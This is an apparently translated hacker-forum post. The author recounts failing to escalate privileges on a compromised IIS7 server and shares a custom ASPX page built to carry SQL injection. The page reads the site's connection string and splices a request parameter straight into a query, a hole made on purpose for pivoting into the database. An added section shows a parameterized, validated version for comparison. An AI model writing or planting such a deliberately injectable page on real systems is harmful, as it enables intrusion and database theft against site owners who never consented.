Yesterday 4z1 and I looked at a site. Privilege escalation was very hard; we spent a full 5 hours on it with no result. 2008 + IIS7, no sa, no root, no services of any kind...
What was actually used was an aspx page that constructs an injection in order to cross sites. I found a pile of code online and none of it worked.
It isn't much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
<script language="c#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    // "连接名" is the name of a connectionStrings entry in the site's web.config
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
    conn.Open();

    string i = this.Page.Request.Params["xxser"]; // the parameter here is ?xxser=1

    // "[表]" and "列名" are placeholders for the table and column name; the parameter is
    // concatenated straight into the SQL text, which is the injection this page is built to carry
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    int x = command.ExecuteNonQuery(); // for a SELECT this returns -1; only whether the statement ran matters here
    Response.Write(i + "\n");
    Response.Write(x);
    conn.Close();
}

</script>
    </div>
    </form>
</body>
</html>
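For comparison, the same lookup with the injection closed off, written here as an added example (not code from the original post): the parameter is validated as an integer and bound with a SqlParameter instead of being spliced into the query text. The connection-string name "ConnName" and the table and column names "MyTable"/"MyColumn" are assumed placeholders.

```csharp
// Added example, not from the original post. Placeholder names are assumed:
// "ConnName" (web.config connectionStrings entry), "MyTable", "MyColumn".
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

public partial class SafeLookup : Page
{
    protected void Page_Init(object sender, EventArgs e)
    {
        // Reject anything that is not an integer before it goes anywhere near SQL.
        int id;
        if (!int.TryParse(Request.Params["xxser"], out id))
        {
            Response.StatusCode = 400;
            Response.End();
            return;
        }

        string cs = ConfigurationManager.ConnectionStrings["ConnName"].ConnectionString;
        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand(
            "SELECT COUNT(*) FROM [MyTable] WHERE [MyColumn] = @id", conn))
        {
            // Bound parameter: the value travels as typed data, never as SQL text,
            // so appended clauses or extra statements in the input cannot change the query.
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int count = (int)cmd.ExecuteScalar();

            // Encode the echoed value so the reflection is not an XSS sink either.
            Response.Write(Server.HtmlEncode(id.ToString()) + "\n");
            Response.Write(count);
        }
    }
}
```

The table and column names still have to be fixed in code; parameters cannot bind identifiers, so a page that lets the caller choose those would need an allow-list instead.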